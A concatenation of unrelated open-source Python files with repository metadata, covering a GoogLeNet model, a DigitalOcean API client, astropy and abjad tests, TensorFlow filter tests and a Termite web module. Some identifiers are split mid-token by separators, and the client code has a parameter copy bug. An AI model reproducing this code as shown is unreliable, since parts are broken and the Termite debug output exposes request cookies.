self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)
|
self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)
self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)
self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)
self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.linear = nn.Linear(1024, 10)
def forward(self, x):
out = self.pre_layers(x)
out = self.a3(out)
out = self.b3(out)
out = self.maxpool(out)
out = self.a
|
4(out)
out = self.b4(out)
out = self.c4(out)
out = self.d4(out)
out = self.e4(out)
out = self.maxpool(out)
out = self.a5(out)
out = self.b5(out)
out = self.avgpool(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
# net = GoogLeNet()
# x = torch.randn(1,3,32,32)
# y = net(Variable(x))
# print(y.size())
|
chuwy/dopy
|
dopy/manager.py
|
Python
|
mit
| 9,514
| 0.003363
|
#!/usr/bin/env python
#coding: utf-8
"""
This module simply sends request to the Digital Ocean API,
and returns their response as a dict.
"""
import requests
API_ENDPOINT = 'https://api.digitalocean.com'
class DoError(RuntimeError):
pass
class DoManager(object):
def __init__(self, client_id, api_key):
self.client_id = client_id
self.api_key = api_key
def all_active_droplets(self):
json = self.request('/droplets/')
return json['droplets']
def new_droplet(self, name, size_id, image_id, region_id,
ssh_key_ids=None, virtio=False, private_networking=False,
backups_enabled=False):
params = {
'name': name,
'size_id': size_id,
'image_id': image_id,
'region_id': region_id,
'virtio': virtio,
'private_networking': private_networking,
'backups_enabled': backups_enabled,
}
if ssh_key_ids:
params['ssh_key_ids'] = ssh_key_ids
json = self.request('/droplets/new', params=params)
return json['droplet']
def show_droplet(self, id):
json = self.request('/droplets/%s' % id)
return json['droplet']
def reboot_droplet(self, id):
json = self.request('/droplets/%s/reboot/' % id)
json.pop('status', None)
return json
def power_cycle_droplet(self, id):
json = self.request('/droplets/%s/power_cycle/' % id)
json.pop('status', None)
return json
def shutdown_droplet(self, id):
json = self.request('/droplets/%s/shutdown/' % id)
json.pop('status', None)
return json
def power_off_droplet(self, id):
json = self.request('/droplets/%s/power_off/' % id)
json.pop('status', None)
return json
def power_on_droplet(self, id):
json = self.request('/droplets/%s/power_on/' % id)
json.pop('status', None)
return json
def password_reset_droplet(self, id):
json = self.request('/droplets/%s/password_reset/' % id)
json.pop('status', None)
return json
def resize_droplet(self, id, size_id):
params = {'size_id': size_id}
json = self.request('/droplets/%s/resize/' % id, params)
json.pop('status', None
|
)
return json
def snapshot_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/snapshot/' % id, params)
json.pop('status', None)
return json
de
|
f restore_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/restore/' % id, params)
json.pop('status', None)
return json
def rebuild_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/rebuild/' % id, params)
json.pop('status', None)
return json
def enable_backups_droplet(self, id):
json = self.request('/droplets/%s/enable_backups/' % id)
json.pop('status', None)
return json
def disable_backups_droplet(self, id):
json = self.request('/droplets/%s/disable_backups/' % id)
json.pop('status', None)
return json
def rename_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/rename/' % id, params)
json.pop('status', None)
return json
def destroy_droplet(self, id, scrub_data=True):
params = {'scrub_data': '1' if scrub_data else '0'}
json = self.request('/droplets/%s/destroy/' % id, params)
json.pop('status', None)
return json
#regions==========================================
def all_regions(self):
json = self.request('/regions/')
return json['regions']
#images==========================================
def all_images(self, filter='global'):
params = {'filter': filter}
json = self.request('/images/', params)
return json['images']
def show_image(self, image_id):
params= {'image_id': image_id}
json = self.request('/images/%s/' % image_id, params)
return json['image']
def destroy_image(self, image_id):
self.request('/images/%s/destroy' % image_id)
return True
def transfer_image(self, image_id, region_id):
params = {'region_id': region_id}
json = self.request('/images/%s/transfer/' % image_id, params)
json.pop('status', None)
return json
#ssh_keys=========================================
def all_ssh_keys(self):
json = self.request('/ssh_keys/')
return json['ssh_keys']
def new_ssh_key(self, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key}
json = self.request('/ssh_keys/new/', params)
return json['ssh_key']
def show_ssh_key(self, key_id):
json = self.request('/ssh_keys/%s/' % key_id)
return json['ssh_key']
def edit_ssh_key(self, key_id, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key} # the doc needs to be improved
json = self.request('/ssh_keys/%s/edit/' % key_id, params)
return json['ssh_key']
def destroy_ssh_key(self, key_id):
self.request('/ssh_keys/%s/destroy/' % key_id)
return True
#sizes============================================
def sizes(self):
json = self.request('/sizes/')
return json['sizes']
#domains==========================================
def all_domains(self):
json = self.request('/domains/')
return json['domains']
def new_domain(self, name, ip):
params = {
'name': name,
'ip_address': ip
}
json = self.request('/domains/new/', params)
return json['domain']
def show_domain(self, domain_id):
json = self.request('/domains/%s/' % domain_id)
return json['domain']
def destroy_domain(self, domain_id):
self.request('/domains/%s/destroy/' % domain_id)
return True
def all_domain_records(self, domain_id):
json = self.request('/domains/%s/records/' % domain_id)
return json['records']
def new_domain_record(self, domain_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
if weight: params['weight'] = port
json = self.request('/domains/%s/records/new/' % domain_id, params)
return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record', but actually it 'record'
def show_domain_record(self, domain_id, record_id):
json = self.request('/domains/%s/records/%s' % (domain_id, record_id))
return json['record']
def edit_domain_record(self, domain_id, record_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
if weight: params['weight'] = port
json = self.request('/domains/%s/records/%s/edit/' % (domain_id, record_id), params)
return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record' for /new/ but 'record' for /edit/.
def destroy_domain_record(self, domain_id, record_id):
return self.request('/domains/%s/records/%s/destroy/' % (domain_id, record_id))
return True
#events===========================================
def show_event(self, event_id):
json = self.request('/events/%s' % event_id)
return json['event']
#low_level========================================
def request(self, path, params={}, method='GET'):
params['clie
|
MSeifert04/astropy
|
astropy/io/fits/tests/test_image.py
|
Python
|
bsd-3-clause
| 76,391
| 0.000406
|
# Licensed under a 3-clause BSD style license - see PYFITS.rst
import math
import os
import re
import time
import warnings
import pytest
import numpy as np
from numpy.testing import assert_equal
from astropy.io import fits
from astropy.tests.helper import catch_warnings, ignore_warnings
from astropy.io.fits.hdu.compressed import SUBTRACTIVE_DITHER_1, DITHER_SEED_CHECKSUM
from .test_table import comparerecords
from . import FitsTestCase
try:
import scipy # noqa
except ImportError:
HAS_SCIPY = False
else:
HAS_SCIPY = True
class TestImageFunctions(FitsTestCase):
def test_constructor_name_arg(self):
"""Like the test of the same name in test_table.py"""
hdu = fits.ImageHDU()
assert hdu.name == ''
assert 'EXTNAME' not in hdu.header
hdu.name = 'FOO'
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
# Passing name to constructor
hdu = fits.ImageHDU(name='FOO')
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
# And overriding a header with a different extname
hdr = fits.Header()
hdr['EXTNAME'] = 'EVENTS'
hdu = fits.ImageHDU(header=hdr, name='FOO')
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
def test_constructor_ver_arg(self):
def assert_ver_is(hdu, reference_ver):
assert hdu.ver == reference_ver
assert hdu.header['EXTVER'] == reference_ver
hdu = fits.ImageHDU()
assert hdu.ver == 1 # defaults to 1
assert 'EXTVER' not in hdu.header
hdu.ver = 1
assert_ver_is(hdu, 1)
# Passing name to constructor
hdu = fits.ImageHDU(ver=2)
assert_ver_is(hdu, 2)
# And overriding a header with a different extver
hdr = fits.Header()
hdr['EXTVER'] = 3
hdu = fits.ImageHDU(header=hdr, ver=4)
assert_ver_is(hdu, 4)
# The header card is not overridden if ver is None or not passed in
hdr = fits.Header()
hdr['EXTVER'] = 5
hdu = fits.ImageHDU(header=hdr, ver=None)
assert_ver_is(hdu, 5)
hdu = fits.ImageHDU(header=hdr)
assert_ver_is(hdu, 5)
def test_constructor_copies_header(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/153
Ensure that a header from one HDU is copied when used to initialize new
HDU.
"""
ifd = fits.HDUList(fits.PrimaryHDU())
phdr = ifd[0].header
phdr['FILENAME'] = 'labq01i3q_rawtag.fits'
primary_hdu = fits.PrimaryHDU(header=phdr)
ofd = fits.HDUList(primary_hdu)
ofd[0].header['FILENAME'] = 'labq01i3q_flt.fits'
# Original header should be unchanged
assert phdr['FILENAME'] == 'labq01i3q_rawtag.fits'
def test_open(self):
# The function "open" reads a FITS file into an HDUList object. There
# are three modes to open: "readonly" (the default), "append", and
# "update".
# Open a file read-only (the default mode), the content of the FITS
# file are read into memory.
r = fits.open(self.data('test0.fits')) # readonly
# data parts are latent instantiation, so if we close the HDUList
# without touching data, data can not be accessed.
r.close()
with pytest.raises(IndexError) as exc_info:
r[1].data[:2, :2]
# Check that the exception message is the enhanced version, not the
# default message from list.__getitem__
assert str(exc_info.value) == ('HDU not found, possibly because the index '
'is out of range, or because the file was '
'closed before all HDUs were read')
def test_open_2(self):
r = fits.open(self.data('test0.fits'))
info = ([(0, 'PRIMARY', 1, 'PrimaryHDU', 138, (), '', '')] +
[(x, 'SCI', x, 'ImageHDU', 61, (40, 40), 'int16', '')
for x in range(1, 5)])
try:
assert r.info(output=False) == info
finally:
r.close()
def test_open_3(self):
# Test that HDUs cannot be accessed after the file was closed
r = fits.open(self.data('test0.fits'))
r.close()
with pytest.raises(IndexError) as exc_info:
r[1]
# Check that the exception message is the enhanced version, not the
# default message from list.__getitem__
assert str(exc_info.value) == ('HDU not found, possibly because the index '
'is out of range, or because the file was '
'closed before all HDUs were read')
# Test that HDUs can be accessed with lazy_load_hdus=False
r = fits.open(self.data('test0.fits'), lazy_load_hdus=False)
r.close()
assert isinstance(r[1], fits.ImageHDU)
assert len(r) == 5
with pytest.raises(IndexError) as exc_info:
r[6]
assert str(exc_info.value)
|
== 'list index out of range'
# And the same with the global config item
assert fits.conf.lazy_load_hdus # True by default
fits.conf.lazy_load_hdus = False
try:
r = fits.open(self.data('test0.fits'))
r.close()
assert isinstance(r[1], fits.ImageHDU)
assert len(r) == 5
finally:
fi
|
ts.conf.lazy_load_hdus = True
def test_fortran_array(self):
# Test that files are being correctly written+read for "C" and "F" order arrays
a = np.arange(21).reshape(3,7)
b = np.asfortranarray(a)
afits = self.temp('a_str.fits')
bfits = self.temp('b_str.fits')
# writting to str specified files
fits.PrimaryHDU(data=a).writeto(afits)
fits.PrimaryHDU(data=b).writeto(bfits)
np.testing.assert_array_equal(fits.getdata(afits), a)
np.testing.assert_array_equal(fits.getdata(bfits), a)
# writting to fileobjs
aafits = self.temp('a_fileobj.fits')
bbfits = self.temp('b_fileobj.fits')
with open(aafits, mode='wb') as fd:
fits.PrimaryHDU(data=a).writeto(fd)
with open(bbfits, mode='wb') as fd:
fits.PrimaryHDU(data=b).writeto(fd)
np.testing.assert_array_equal(fits.getdata(aafits), a)
np.testing.assert_array_equal(fits.getdata(bbfits), a)
def test_fortran_array_non_contiguous(self):
# Test that files are being correctly written+read for 'C' and 'F' order arrays
a = np.arange(105).reshape(3,5,7)
b = np.asfortranarray(a)
# writting to str specified files
afits = self.temp('a_str_slice.fits')
bfits = self.temp('b_str_slice.fits')
fits.PrimaryHDU(data=a[::2, ::2]).writeto(afits)
fits.PrimaryHDU(data=b[::2, ::2]).writeto(bfits)
np.testing.assert_array_equal(fits.getdata(afits), a[::2, ::2])
np.testing.assert_array_equal(fits.getdata(bfits), a[::2, ::2])
# writting to fileobjs
aafits = self.temp('a_fileobj_slice.fits')
bbfits = self.temp('b_fileobj_slice.fits')
with open(aafits, mode='wb') as fd:
fits.PrimaryHDU(data=a[::2, ::2]).writeto(fd)
with open(bbfits, mode='wb') as fd:
fits.PrimaryHDU(data=b[::2, ::2]).writeto(fd)
np.testing.assert_array_equal(fits.getdata(aafits), a[::2, ::2])
np.testing.assert_array_equal(fits.getdata(bbfits), a[::2, ::2])
def test_primary_with_extname(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/151
Tests that the EXTNAME keyword works with Primary HDUs as well, and
interacts properly with the .name attribute. For convenience
hdulist['PRIMARY'] will still refer to the first HDU even if it has an
EXTNAME not equal to 'PRIMARY'.
"""
prihdr = fits.Header([('EXTNAME', 'XPRIMARY'), ('EXTVER', 1)])
hdul = fits.HDUList([fits.PrimaryHDU(header=prihdr)])
assert 'EXTNAME' in hdul[0].header
|
sathishpy/corrugation
|
corrugation/corrugation/doctype/cm_paper_management/test_cm_paper_management.py
|
Python
|
gpl-3.0
| 227
| 0.008811
|
# -*- coding: utf-8 -*-
# Copyright
|
(c) 2017, sathishpy@gmail.com and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestCMPaperManage
|
ment(unittest.TestCase):
pass
|
kbrafford/pg
|
examples/terrain.py
|
Python
|
mit
| 2,927
| 0.00205
|
from collections import defaultdict
import colorsys
import pg
def noise(x, z):
a = pg.simplex2(-x * 0.01, -z * 0.01, 4)
b = pg.simplex2(x * 0.1, z * 0.1, 4)
return (a + 1) * 16 + b / 10
def generate_color(x, z):
m = 0.005
h = (pg.simplex2(x * m, z * m, 4) + 1) / 2
s = (pg.simplex2(-x * m, z * m, 4) + 1) / 2
v = (pg.simplex2(x * m, -z * m, 4) + 1) / 2
v = v * 0.5 + 0.5
return colorsys.hsv_to_rgb(h, s, v)
class Window(pg.Window):
def setup(self):
self.wasd = pg.WASD(self, speed=30)
self.wasd.look_at((-20, 20, -8), (0, 0, 0))
self.context = pg.Context(pg.DirectionalLightProgram())
self.context.use_color = True
self.context.specular_power = 8.0
self.context.specular_multiplier = 0.3
normals = defaultdict(list)
position = []
normal = []
color = []
size = 50
# generate height map
height = {}
colors = {}
for x in xrange(-size, size + 1):
for z in xrange(-size, size + 1):
height[(x, z)] = noise(x, z)
colors[(x, z)] = generate_color(x, z)
# generate triangles and track normals for all vertices
for x in xrange(-size, size):
for z in xrange(-size, size):
t1 = [x + 0, z + 0, x + 1, z + 0, x + 0, z + 1]
t2 = [x + 0, z + 1, x + 1, z + 0, x + 1, z + 1]
for t in [t1, t2]:
x1, z1, x2, z2, x3, z3 = t
p1 = (x1, height[(x1, z1)], z1)
p2 = (x2, height[(x2, z2)], z2)
p3 = (x3, height[(x3, z3)], z3)
c1 = colors[(x1, z1)]
c2 = colors[(x2, z2)]
c3 = colors[(x3, z3)]
position.extend([p3, p2, p1])
color.extend([c3, c2, c1])
n = pg.normalize(pg.cross(pg.sub(p3, p1), pg.sub(p2, p1)))
normals[(x1, z1)].append(n)
normals[(x2, z2)].append(n)
|
normals[(x3, z3)].append(n)
# compute average normal for all vertices
for key, value in normals.items():
normals[key] = pg.normalize(reduce(pg.add, value))
for x, y, z in position:
normal.append(normals[(x, z)])
# generate vertex buffer
vb = pg.VertexBuffer
|
(pg.interleave(position, normal, color))
self.context.position, self.context.normal, self.context.color = (
vb.slices(3, 3, 3))
def update(self, t, dt):
matrix = pg.Matrix()
matrix = self.wasd.get_matrix(matrix)
matrix = matrix.perspective(65, self.aspect, 0.1, 1000)
self.context.matrix = matrix
self.context.camera_position = self.wasd.position
def draw(self):
self.clear()
self.context.draw()
if __name__ == "__main__":
pg.run(Window)
|
jyt109/termite-data-server
|
server_src/modules/core.py
|
Python
|
bsd-3-clause
| 4,206
| 0.07204
|
#!/usr/bin/env python
import os
import json
class TermiteCore:
def __init__( self, request, response ):
self.request = request
self.response = response
def GetConfigs( self ):
def GetServer():
return self.request.env['HTTP_HOST']
def GetDataset():
return self.request.application
def GetModel():
return self.request.controller
def GetAttribute():
return self.request.function
def GetDatasets( dataset ):
FOLDER_EXCLUSIONS = frozenset( [ 'admin', 'examples', 'welcome', 'init' ] )
applications_parent = self.request.env['applications_parent']
applications_path = '{}/applications'.format( applications_parent )
folders = []
for folder in os.listdir( applications_path ):
applications_subpath = '{}/{}'.format( applications_path, folder )
if os.path.isdir( applications_subpath ):
if folder not in FOLDER_EXCLUSIONS:
folders.append( folder )
folders = sorted( folders )
return folders
def GetModels( dataset, model ):
if dataset == 'init':
return None
app_data_path = '{}/data'.format( self.request.folder )
folders = []
for folder in os.listdir( app_data_path ):
app_data_subpath = '{}/{}'.format( app_data_path, folder )
if os.path.isdir( app_data_subpath ):
folders.append( folder )
folders = sorted( folders )
return folders
def GetAttributes( dataset, model, attribute ):
if dataset == 'init':
return None
if model == 'default':
return None
if model == 'lda':
return [
'DocIndex',
'TermIndex',
'TopicIndex',
'TermTopicMatrix',
'DocTopicMatrix',
'TopicCooccurrence'
]
elif model == 'corpus':
return [
'DocMeta',
'TermFreqs',
'TermCoFreqs'
]
else:
return []
server = GetServer()
dataset = GetDataset()
datasets = GetDatasets( dataset )
model = GetModel()
models = GetModels( dataset, model )
attribute = GetAttribute()
attributes = GetAttributes( dataset, model, attribute )
configs = {
'server' : server,
'dataset' : dataset,
'datasets' : datasets,
'model' : model,
'models' : models,
'attribute' : attribute,
'attributes' : attributes
}
return configs
def IsDebugMode( self ):
return 'debug' in self.request.vars
def IsJsonFormat( self ):
return 'format' in self.request.vars and 'json' == self.request.vars['format'].lower()
def GenerateResponse( self, params = {}, keysAndValues = {} ):
if self.IsDebugMode():
return self.GenerateDebugResponse()
else:
return self.GenerateNormalResponse( params, keysAndValues )
def GenerateDebugResponse( self ):
def GetEnv( env ):
dat
|
a = {}
for key in env:
value = env[key]
if isinstance( value, dict ) or \
isinstance(
|
value, list ) or isinstance( value, tuple ) or \
isinstance( value, str ) or isinstance( value, unicode ) or \
isinstance( value, int ) or isinstance( value, long ) or isinstance( value, float ) or \
value is None or value is True or value is False:
data[ key ] = value
else:
data[ key ] = 'N/A'
return data
info = {
'env' : GetEnv( self.request.env ),
'cookies' : self.request.cookies,
'vars' : self.request.vars,
'get_vars' : self.request.get_vars,
'post_vars' : self.request.post_vars,
'folder' : self.request.folder,
'application' : self.request.application,
'controller' : self.request.controller,
'function' : self.request.function,
'args' : self.request.args,
'extension' : self.request.extension,
'now' : str( self.request.now )
}
return json.dumps( info, encoding = 'utf-8', indent = 2, sort_keys = True )
def GenerateNormalResponse( self, params, keysAndValues = {} ):
data = {
'params' : params,
'configs' : self.GetConfigs()
}
data.update( keysAndValues )
dataStr = json.dumps( data, encoding = 'utf-8', indent = 2, sort_keys = True )
# Workaround while we build up the server-client architecture
self.response.headers['Access-Control-Allow-Origin'] = 'http://' + self.request.env['REMOTE_ADDR'] + ':8080'
if self.IsJsonFormat():
return dataStr
else:
data[ 'content' ] = dataStr
return data
|
mscuthbert/abjad
|
abjad/tools/selectiontools/test/test_selectiontools_Parentage_logical_voice.py
|
Python
|
gpl-3.0
| 10,702
| 0.000748
|
# -*- encoding: utf-8 -*-
from abjad import *
import pytest
def test_selectiontools_Parentage_logical_voice_01():
r'''An anonymous staff and its contained unvoiced leaves share
the same signature.
'''
staff = Staff("c'8 d'8 e'8 f'8")
containment = inspect_(staff).get_parentage().logical_voice
for component in iterate(staff).by_class():
assert inspect_(component).get_parentage().logical_voice == containment
|
def test_selectiontools_Parentage_logical_voice_02():
r'''A named staff and its contained unvoiced leaves share
the same signature.
'''
staff = Staff("c'8 d'8 e'8 f'8")
staff.name = 'foo'
containment = inspect_(staff).get_parentage().logical_voice
for com
|
ponent in iterate(staff).by_class():
assert inspect_(component).get_parentage().logical_voice == containment
def test_selectiontools_Parentage_logical_voice_03():
r'''Leaves inside equally named sequential voices inside a staff
share the same signature.
'''
staff = Staff(Voice("c'8 d'8 e'8 f'8") * 2)
staff[0].name = 'foo'
staff[1].name = 'foo'
containment = inspect_(staff[0][0]).get_parentage().logical_voice
for leaf in staff.select_leaves():
assert inspect_(leaf).get_parentage().logical_voice == containment
def test_selectiontools_Parentage_logical_voice_04():
r'''Returns logical voice giving the root and
first voice, staff and score in the parentage of component.
'''
voice = Voice(
r'''
c'8
d'8
<<
\new Voice {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
'''
)
override(voice).note_head.color = 'red'
assert systemtools.TestManager.compare(
voice,
r'''
\new Voice \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\new Voice {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
assert signatures[0] == signatures[1]
assert signatures[0] != signatures[2]
assert signatures[0] != signatures[4]
assert signatures[0] == signatures[6]
assert signatures[2] == signatures[3]
assert signatures[2] != signatures[4]
def test_selectiontools_Parentage_logical_voice_05():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
voice = Voice(
r'''
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
'''
)
override(voice).note_head.color = 'red'
voice.name = 'foo'
assert systemtools.TestManager.compare(
voice,
r'''
\context Voice = "foo" \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
signatures[0] == signatures[1]
signatures[0] == signatures[2]
signatures[0] != signatures[4]
signatures[0] == signatures[6]
signatures[2] == signatures[0]
signatures[2] == signatures[3]
signatures[2] == signatures[4]
signatures[2] == signatures[6]
signatures[4] != signatures[0]
signatures[4] != signatures[2]
signatures[4] == signatures[5]
signatures[4] == signatures[6]
def test_selectiontools_Parentage_logical_voice_06():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container([
Staff([Voice("c'8 d'8")]),
Staff([Voice("e'8 f'8")]),
])
container[0].name = 'staff1'
container[1].name = 'staff2'
container[0][0].name = 'voicefoo'
container[1][0].name = 'voicefoo'
beam = Beam()
statement = 'attach(beam, container.select_leaves())'
assert pytest.raises(AssertionError, statement)
leaves = container.select_leaves(allow_discontiguous_leaves=True)
beam = Beam()
attach(beam, leaves[:2])
beam = Beam()
attach(beam, leaves[2:])
assert systemtools.TestManager.compare(
container,
r'''
{
\context Staff = "staff1" {
\context Voice = "voicefoo" {
c'8 [
d'8 ]
}
}
\context Staff = "staff2" {
\context Voice = "voicefoo" {
e'8 [
f'8 ]
}
}
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in leaves]
signatures[0] == signatures[1]
signatures[0] != signatures[2]
signatures[2] != signatures[2]
signatures[2] == signatures[3]
def test_selectiontools_Parentage_logical_voice_07():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container(
r'''
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" {
g'8
}
}
a'8
'''
)
override(container[1][1]).note_head.color = 'red'
override(container[2][1]).note_head.color = 'red'
assert systemtools.TestManager.compare(
container,
r'''
{
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
g'8
}
}
a'8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in container.select_leaves(allow_discontiguous_leaves=True)]
signatures[0] != signatures[1]
signatures[0] != signatures[2]
signatures[0] != signatures[3]
signatures[0] != signatures[4]
signatures[0] == signatures[5]
signatures[1] != signatures[0]
signatures[1] != signatures[2]
signatures[1] == signatures[3]
signatures[1] != signatures[4]
signatures[1] != signatures[5]
signatures[2] != signatures[0]
signatures[2] != signatures[1]
signatures[2] != signatures[3]
signatures[2] == signatures[4]
signatures[2] != signatures[5]
def test_selectiontools_Parentage_logical_voice_08():
r'''Unicorporated leaves carry equivalent containment signatures.
'''
note_1 = Note(0, (1, 8))
note_2 = Note(0, (1, 8))
signature_1 = inspect_(note_1).get_parentage().logical_voice
signature_2 = inspect_(note_2).get_parentage().logical_voice
assert signature_1 == signature_2
def test_selectiontools_Parentage_logical_voice_
|
tensorflow/addons
|
tensorflow_addons/image/tests/filters_test.py
|
Python
|
apache-2.0
| 11,712
| 0.000256
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may noa use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import pytest
import numpy as np
import tensorflow as tf
from tensorflow_addons.image import mean_filter2d
from tensorflow_addons.image import median_filter2d
from tensorflow_addons.image import gaussian_filter2d
from tensorflow_addons.utils import test_utils
from scipy.ndimage.filters import gaussian_filter
_dtypes_to_test = {
tf.dtypes.uint8,
tf.dtypes.int32,
tf.dtypes.float16,
tf.dtypes.float32,
tf.dtypes.float64,
}
_image_shapes_to_test = [
(3, 3, 1),
(3, 3, 3),
(1, 3, 3, 1),
(1, 3, 3, 3),
(2, 3, 3, 1),
(2, 3, 3, 3),
]
def tile_image(plane, image_shape):
"""Tile a 2-D image `plane` into 3-D or 4-D as per `image_shape`."""
assert 3 <= len(image_shape) <= 4
plane = tf.convert_to_tensor(plane)
plane = tf.expand_dims(plane, -1)
channels = image_shape[-1]
image = tf.tile(plane, (1, 1, channels))
if len(image_shape) == 4:
batch_size = image_shape[0]
image = tf.expand_dims(image, 0)
image = tf.tile(image, (batch_size, 1, 1, 1))
return image
def setup_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, dtype
):
assert 3 <= len(image_shape) <= 4
height, width = image_shape[-3], image_shape[-2]
plane = tf.constant(
[x for x in range(1, height * width + 1)], shape=(height, width), dtype=dtype
)
image = tile_image(plane, image_shape=image_shape)
result = filter2d_fn(
image,
filter_shape=filter_shape,
padding=padding,
constant_values=constant_values,
)
return result
def verify_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, expected_plane
):
expected_output = tile_image(expected_plane, image_shape)
for dtype in _dtypes_to_test:
result = setup_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, dtype
)
np.testing.assert_allclose(
result.numpy(),
tf.dtypes.cast(expected_output, dtype).numpy(),
rtol=1e-02,
atol=1e-02,
)
def setUp(self):
self._filter2d_fn = mean_filter2d
super().setUp()
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_mean(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
mean_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_mean(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
mean_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_mean():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, padding="TEST")
def test_none_channels_mean():
# 3-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(shape=(1, 3, 3, 3)))
@pytest.mark.parametrize("shape", [(3, 3), (3, 3, 3), (1, 3, 3, 3)])
def test_unknown_shape_mean(shape):
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(shape=None, dtype=tf.dtypes.float32),
padding="CONSTANT",
constant_values=1.0,
)
image = tf.ones(shape=shape)
np.testing.assert_equal(image.numpy(), fn(image).numpy())
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[3.6666667, 4.0, 4.3333335],
[4.6666665, 5.0, 5.3333335],
[5.6666665, 6.0, 6.3333335],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_4x4_filter_mean(image_shape):
expected_plane = tf.constant(
[
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(4, 4),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_constant_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[1.3333334, 2.3333333, 1.7777778],
[3.0, 5.0, 3.6666667],
[2.6666667, 4.3333335, 3.1111112],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=0,
expected_plane=expected_plane,
)
expected_plane = tf.constant(
[
[1.8888888, 2.6666667, 2.3333333],
